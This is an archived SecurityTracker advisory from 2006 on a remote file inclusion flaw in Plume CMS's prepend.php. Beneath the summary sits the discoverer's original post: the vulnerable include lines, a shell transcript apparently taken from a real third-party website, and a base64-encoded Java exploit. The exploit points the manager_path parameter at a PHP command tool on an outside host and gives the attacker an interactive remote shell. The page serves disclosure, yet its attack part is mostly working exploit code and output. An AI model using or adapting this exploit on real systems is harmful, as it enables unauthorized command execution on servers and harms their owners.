SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Plume CMS Vendors:   plume-cms.net
Plume CMS Include File Error in 'prepend.php' Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1015624
SecurityTracker URL:  http://securitytracker.com/id/1015624
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 14 2006
Impact:   Execution of arbitrary code via network, User access via network


Description:   unitedbr of Untruth Labs reported a vulnerability in Plume CMS. A remote user can execute arbitrary commands on the target system.

The 'prepend.php' script does not properly validate user-supplied input in the 'manager_path' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.plume-cms.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Plume CMS bug and exploit


/*
                  ____   ____    __
|    |     |     |    | |    |  /
|    |     |     |    | |___/   \
|    | --- |     |----| |   \    \
|____|     |____ |    | |____| __/
 
Copyright (C) 2006 Untruth Labs

Plume CMS remote file inclusion
bug founded by unitedbr

remote: yes
vendor: www.plume-cms.net
exploitation: the user can inject remote bad php code

file prepend.php, line 38 and 39:

include_once $_PX_config['manager_path'].'/conf/config.php';
include_once $_PX_config['manager_path'].'/inc/lib.text.php';


Exploit working:

$ java plume1 www.airedebussac.org /

 -===========================-
 -=  Untruth Labs presents  =-
 -=                         =-
 -=    PLUME CMS EXPLOIT    =-
 -=                         =-
 -=          by unitedbr    =-
 -===========================-

bash-2.05$ id
id
uid=55012(airedebu) gid=100(users) groups=99(nobody)

bash-2.05$ uname -a
uname -a
Linux web118.60gp.ha.ovh.net 2.4.31-mutu-hidden #1 SMP Tue Oct 11 11:51:39 CEST
2005 i686 unknown

bash-2.05$ pwd
pwd
/home.2/airedebu/www

bash-2.05$ exit
exit

$
 
*/


Content-Type: application/octet-stream; name="plume1.java"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="plume1.java"

LyoNCiAgICAgICAgICAgICAgICAgIF9fX18gICBfX19fICAgIF9fDQp8ICAgIHwgICAgIHwgICAg
IHwgICAgfCB8ICAgIHwgIC8NCnwgICAgfCAgICAgfCAgICAgfCAgICB8IHxfX18vICAgXA0KfCAg
ICB8IC0tLSB8ICAgICB8LS0tLXwgfCAgIFwgICAgXA0KfF9fX198ICAgICB8X19fXyB8ICAgIHwg
fF9fX198IF9fLw0KDQpDb3B5cmlnaHQgKEMpIDIwMDYgVW50cnV0aCBMYWJzDQoNClBsdW1lIENN
UyByZW1vdGUgZmlsZSBpbmNsdXNpb24NCmJ1ZyBmb3VuZGVkIGJ5IHVuaXRlZGJyDQoNCnJlbW90
ZTogeWVzDQp2ZW5kb3I6IHd3dy5wbHVtZS1jbXMubmV0DQpleHBsb2l0YXRpb246IHRoZSB1c2Vy
IGNhbiBpbmplY3QgcmVtb3RlIGJhZCBwaHAgY29kZQ0KDQpmaWxlIHByZXBlbmQucGhwLCBsaW5l
IDM4IGFuZCAzOToNCg0KaW5jbHVkZV9vbmNlICRfUFhfY29uZmlnWydtYW5hZ2VyX3BhdGgnXS4n
L2NvbmYvY29uZmlnLnBocCc7DQppbmNsdWRlX29uY2UgJF9QWF9jb25maWdbJ21hbmFnZXJfcGF0
aCddLicvaW5jL2xpYi50ZXh0LnBocCc7DQoNCg0KRXhwbG9pdCB3b3JraW5nOg0KDQokIGphdmEg
cGx1bWUxIHd3dy53aHluZXQub3JnIC9kb3NzaWVycy8NCg0KIC09PT09PT09PT09PT09PT09PT09
PT09PT09PT0tDQogLT0gIFVudHJ1dGggTGFicyBwcmVzZW50cyAgPS0NCiAtPSAgICAgICAgICAg
ICAgICAgICAgICAgICA9LQ0KIC09ICAgIFBMVU1FIENNUyBFWFBMT0lUICAgID0tDQogLT0gICAg
ICAgICAgICAgICAgICAgICAgICAgPS0NCiAtPSAgICAgICAgICBieSB1bml0ZWRiciAgICA9LQ0K
IC09PT09PT09PT09PT09PT09PT09PT09PT09PT0tDQoNCmJhc2gtMi4wNSQgaWQNCmlkDQp1aWQ9
NTUwMTIoYWlyZWRlYnUpIGdpZD0xMDAodXNlcnMpIGdyb3Vwcz05OShub2JvZHkpDQoNCmJhc2gt
Mi4wNSQgdW5hbWUgLWENCnVuYW1lIC1hDQpMaW51eCB3ZWIxMTguNjBncC5oYS5vdmgubmV0IDIu
NC4zMS1tdXR1LWhpZGRlbiAjMSBTTVAgVHVlIE9jdCAxMSAxMTo1MTozOSBDRVNUDQoyMDA1IGk2
ODYgdW5rbm93bg0KDQpiYXNoLTIuMDUkIHB3ZA0KcHdkDQovaG9tZS4yL2FpcmVkZWJ1L3d3dw0K
DQpiYXNoLTIuMDUkIGV4aXQNCmV4aXQNCg0KJA0KIA0KIA0KIE9CUzogdXNlIG9ubHkgcjN2M25n
NG5zIGNtZCB0byBleHBsb2l0IHdpdGggdGhpcyBleHBsb2l0LCBvdGhlcndpc2Ugd29uJ3Qgd29y
ayA6XA0KIA0KICovDQoNCmltcG9ydCBqYXZhLmlvLio7DQppbXBvcnQgamF2YS5uZXQuKjsNCg0K
DQpwdWJsaWMgY2xhc3MgcGx1bWUxIHsNCgkNCglwdWJsaWMgc3RhdGljIFN0cmluZyBmaWx0cmFy
Q29tYW5kb0V4ZWN1dGFkbyggU3RyaW5nIHJlc3Bvc3RhICkNCgl7DQoJCXJldHVybiByZXNwb3N0
YS5zdWJzdHJpbmcocmVzcG9zdGEuaW5kZXhPZigiYmFja2dyb3VuZC1jb2xvcjpibGFjazt3aWR0
aDo2ODM7XCI+IikgKyAzNSwgcmVzcG9zdGEuaW5kZXhPZigiPC9URVhUQVJFQT4iKSApOw0KCX0N
CiAgICANCiAgICBwdWJsaWMgc3RhdGljIFN0cmluZyB0aXJhQmFycmEoIFN0cmluZyBzaXRlICkN
CiAgICB7DQogICAgCQlyZXR1cm4gc2l0ZS5zdWJzdHJpbmcoMCwgc2l0ZS5pbmRleE9mKCIvIikg
KTsNCiAgICB9DQogICAgDQogICAgcHVibGljIHN0YXRpYyBTdHJpbmcgdGlyYUh0dHAoIFN0cmlu
ZyBzaXRlICkNCiAgICB7DQogICAgCXJldHVybiBzaXRlLnN1YnN0cmluZyg3LCBzaXRlLmxlbmd0
aCgpKTsNCiAgICB9DQoJDQoJcHVibGljIHN0YXRpYyBTdHJpbmcgZ2V0UmVzcG9uc2UoIFN0cmlu
ZyBzaXRlLCBTdHJpbmcgZGlyLCBTdHJpbmcgY21kICkNCgl7DQoJCQ0KCQlTdHJpbmcgcGhwX3N0
cmluZyA9ICIvcHJlcGVuZC5waHA/X1BYX2NvbmZpZ1ttYW5hZ2VyX3BhdGhdPSI7DQoJCVN0cmlu
ZyB0b29sID0gImh0dHA6Ly93d3cuamttYXJ0LmluZm8vYTF0cy90b29sLmdpZj8mY21kPSI7DQoJ
CVN0cmluZyByZWNlYmlkbyA9ICIiOw0KCQlpbnQgaSA9IDA7DQoJCQ0KCQlpZiAoIChzaXRlLmxl
bmd0aCgpID4gNykgJiYgKHNpdGUuaW5kZXhPZigiaHR0cDovLyIpID4gLTEpICkNCgkJCXNpdGUg
PSB0aXJhSHR0cChzaXRlKTsNCgkJCQ0KCQlpZiggc2l0ZS5pbmRleE9mKCIvIikgPiAtMSApDQoJ
CQlzaXRlID0gdGlyYUJhcnJhKHNpdGUpOw0KCQkNCgkJaW50IHBvczEgPSBkaXIuaW5kZXhPZigi
LyIpOw0KCQlpbnQgcG9zMiA9IGRpci5sYXN0SW5kZXhPZigiLyIpOw0KCQkNCgkJU3RyaW5nIHRl
bXAgPSAiIjsNCgkJDQoJCWlmKCBwb3MxID09IHBvczIgKQ0KCQl7DQoJCQl0ZW1wID0gZGlyOw0K
CQkJZGlyID0gIi8iICsgdGVtcDsNCgkJfSANCgkJDQoJCXRyeSB7DQogICAgICAgIC8vIENvbnN0
cnVjdCBkYXRhDQogICAgICAgIFN0cmluZyBDTUQgPSBVUkxFbmNvZGVyLmVuY29kZShjbWQsICJV
VEYtOCIpOw0KICAgIA0KICAgICAgICAvLyBDcmVhdGUgYSBzb2NrZXQgdG8gdGhlIGhvc3QNCiAg
ICAgICAgU3RyaW5nIGhvc3RuYW1lID0gc2l0ZTsNCiAgICAgICAgaW50IHBvcnQgPSA4MDsNCiAg
ICAgICAgSW5ldEFkZHJlc3MgYWRkciA9IEluZXRBZGRyZXNzLmdldEJ5TmFtZShob3N0bmFtZSk7
DQogICAgICAgIFNvY2tldCBzb2NrZXQgPSBuZXcgU29ja2V0KGFkZHIsIHBvcnQpOw0KICAgIA0K
ICAgICAgICBCdWZmZXJlZFdyaXRlciB3ciA9IG5ldyBCdWZmZXJlZFdyaXRlcihuZXcgT3V0cHV0
U3RyZWFtV3JpdGVyKHNvY2tldC5nZXRPdXRwdXRTdHJlYW0oKSwgIlVURjgiKSk7DQogICAgICAg
IA0KICAgICAgICAvLyBzdHJpbmc6IHd3dy52aXRpbWEuY29tL3ByZXBlbmQucGhwP19QWF9jb25m
aWdbbWFuYWdlcl9wYXRoXT1odHRwOi8vd3d3LmprbWFydC5pbmZvL2ExdHMvdG9vbC5naWY/JmNt
ZD1DTUQNCiAgICAgICAgd3Iud3JpdGUoIkdFVCAiICsgZGlyICsgcGhwX3N0cmluZyArIHRvb2wg
KyBDTUQgKyAiIEhUVFAvMS4wXHJcbiIpOw0KICAgICAgICB3ci53cml0ZSgiVXNlci1BZ2VudDog
TW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMSlcclxuIik7
DQogICAgICAgIHdyLndyaXRlKCJIb3N0OiAiICsgaG9zdG5hbWUgKyAiXHJcbiIpOw0KICAgICAg
ICB3ci53cml0ZSgiQWNjZXB0OiAqLypcclxuIik7DQogICAgICAgIHdyLndyaXRlKCJDb25uZWN0
aW9uOiBDbG9zZVxyXG4iKTsNCiAgICAgICAgd3Iud3JpdGUoIlxyXG4iKTsNCiAgICAgICAgDQog
ICAgICAgIHdyLmZsdXNoKCk7DQogICAgDQogICAgICAgIC8vIEdldCByZXNwb25zZQ0KICAgICAg
ICBCdWZmZXJlZFJlYWRlciByZCA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1S
ZWFkZXIoc29ja2V0LmdldElucHV0U3RyZWFtKCkpKTsNCiAgICAgICAgU3RyaW5nIGxpbmU7DQog
ICAgICAgIHdoaWxlICgobGluZSA9IHJkLnJlYWRMaW5lKCkpICE9IG51bGwpIHsNCiAgICAgICAg
ICAgIHJlY2ViaWRvICs9IGxpbmU7DQogICAgICAgICAgICBpKys7DQogICAgICAgIH0NCiAgICAg
ICAgDQogICAgICAgIHdyLmNsb3NlKCk7DQogICAgICAgIHJkLmNsb3NlKCk7DQoJICAgIH0gY2F0
Y2ggKEV4Y2VwdGlvbiBlKSB7DQoJICAgIAlTeXN0ZW0ub3V0LnByaW50bG4oIlt+XSBFeGNlcHRp
b24gRXJyb3I6ICIgKyBlLmdldE1lc3NhZ2UoKSk7DQoJICAgIH0NCgkgICAgDQoJICAgIHJldHVy
biByZWNlYmlkbzsNCgl9DQoJDQoJcHVibGljIHN0YXRpYyB2b2lkIHVzYWdlKCkNCgl7DQoJCVN5
c3RlbS5vdXQucHJpbnRsbigiXG4gLT09PT09PT09PT09PT09PT09PT09PT09PT09PS0iICsNCgkJ
CQkJCQkJIlxuIC09ICBVbnRydXRoIExhYnMgcHJlc2VudHMgID0tIiArDQoJCQkJCQkJCSJcbiAt
PSAgICAgICAgICAgICAgICAgICAgICAgICA9LSIgKw0KCQkJCQkJCQkiXG4gLT0gICAgUExVTUUg
Q01TIEVYUExPSVQgICAgPS0iICsNCgkJCQkJCQkJIlxuIC09ICAgICAgICAgICAgICAgICAgICAg
ICAgID0tIiArDQoJCQkJCQkJCSJcbiAtPSAgICAgICAgICBieSB1bml0ZWRiciAgICA9LSIgKw0K
CQkJCQkJCQkiXG4gLT09PT09PT09PT09PT09PT09PT09PT09PT09PS0iICsNCgkJCQkJCQkJIlxu
XG4gVXNhZ2U6IiArDQoJCQkJCQkJCSJcbiAgIGphdmEgcGx1bWUxIHd3dy5zaXRlLmNvbSAvZGly
LyIgKw0KCQkJCQkJCQkiXG4gICBqYXZhIHBsdW1lMSB3d3cuc2l0ZS5jb20gLyIpOw0KCX0NCgkN
CglwdWJsaWMgc3RhdGljIHZvaWQgYmFzaCggU3RyaW5nIHNpdGUsIFN0cmluZyBkaXIgKSB0aHJv
d3MgSU9FeGNlcHRpb24NCgl7DQoJCVN0cmluZyBpbnB1dCA9ICIiLCByZXNwb3N0YSA9ICIiLCBj
b21hbmRvID0gIiI7DQoJCQ0KCQlTeXN0ZW0ub3V0LnByaW50bG4oIlxuIC09PT09PT09PT09PT09
PT09PT09PT09PT09PT0tIiArDQoJCQkJCQkJCSJcbiAtPSAgVW50cnV0aCBMYWJzIHByZXNlbnRz
ICA9LSIgKw0KCQkJCQkJCQkiXG4gLT0gICAgICAgICAgICAgICAgICAgICAgICAgPS0iICsNCgkJ
CQkJCQkJIlxuIC09ICAgIFBMVU1FIENNUyBFWFBMT0lUICAgID0tIiArDQoJCQkJCQkJCSJcbiAt
PSAgICAgICAgICAgICAgICAgICAgICAgICA9LSIgKw0KCQkJCQkJCQkiXG4gLT0gICAgICAgICAg
YnkgdW5pdGVkYnIgICAgPS0iICsNCgkJCQkJCQkJIlxuIC09PT09PT09PT09PT09PT09PT09PT09
PT09PT0tIik7DQoJCQ0KCQl3aGlsZSAoICFpbnB1dC5lcXVhbHMoImV4aXQiKSAmJiAhaW5wdXQu
ZXF1YWxzKCJleGl0MSIpICkJCQkJCQkNCgkJew0KCQkJdHJ5IHsgDQoJCQkJQnVmZmVyZWRSZWFk
ZXIgaW4gPSBuZXcgQnVmZmVyZWRSZWFkZXIoIG5ldyBJbnB1dFN0cmVhbVJlYWRlciggU3lzdGVt
LmluICkgKSA7DQoJCQkJU3lzdGVtLm91dC5wcmludCgiXG5iYXNoLTIuMDUkICIpOw0KCQkJCWlu
cHV0ID0gaW4ucmVhZExpbmUoKTsNCgkJCQlTeXN0ZW0ub3V0LnByaW50bG4oaW5wdXQpOw0KCQkJ
CQ0KCQkJCWlmKCAhaW5wdXQuZXF1YWxzKCJleGl0IikgKQ0KCQkJCXsNCgkJCQkJcmVzcG9zdGEg
PSBnZXRSZXNwb25zZSggc2l0ZSwgZGlyLCBpbnB1dCApOw0KCQkJCQ0KCQkJCQlpZiggIXJlc3Bv
c3RhLmVxdWFscygiIikgJiYgcmVzcG9zdGEuaW5kZXhPZigiYmFja2dyb3VuZC1jb2xvcjpibGFj
azt3aWR0aDo2ODM7XCI+IikgPiAtMSApDQoJCQkJCQljb21hbmRvID0gZmlsdHJhckNvbWFuZG9F
eGVjdXRhZG8oIHJlc3Bvc3RhICk7DQoJCQkJCWVsc2UNCgkJCQkJCWlucHV0ID0gImV4aXQxIjsN
CgkJCQkJCQ0KCQkJCQlTeXN0ZW0ub3V0LnByaW50bG4oY29tYW5kbyk7DQoJCQkJfQ0KCQkJfQ0K
CQkJY2F0Y2ggKEV4Y2VwdGlvbiBlKSANCgkJCXsNCgkJCQlTeXN0ZW0ub3V0LnByaW50bG4oIlxu
RXhjZXB0aW9uIEVSUk9SOiAiICsgZS5nZXRNZXNzYWdlKCkgKTsNCgkJCX0NCgkJCWlmKCBpbnB1
dC5lcXVhbHMoImV4aXQxIikgKQ0KCQkJew0KCQkJCVN5c3RlbS5vdXQucHJpbnRsbigiXG5ObyB3
YXkgdG8gZXhwbG9pdCB0aGlzIHNpdGUgOlxcIik7DQoJCQkJU3lzdGVtLm91dC5wcmludGxuKCJN
YXliZSBpcyBGb3JiaWRkZW4sIE5vdCBGb3VuZCBvciBpbiBzYWZlbW9kZS4uLiIpOw0KCQkJfQ0K
CQl9DQoJCQ0KCX0NCgkNCglwdWJsaWMgc3RhdGljIHZvaWQgbWFpbiAoIFN0cmluZyBhcmdzW10g
KSB0aHJvd3MgSU9FeGNlcHRpb24NCgl7DQoJCWlmKCBhcmdzLmxlbmd0aCAhPSAyKQ0KCQl7DQoJ
CQl1c2FnZSgpOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJU3RyaW5nIHNpdGUgPSBhcmdzWzBdOw0K
CQkJU3RyaW5nIGRpciA9IGFyZ3NbMV07DQoJCQkNCgkJCWJhc2goc2l0ZSwgZGlyKTsJDQoJCX0N
Cgl9DQp9
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC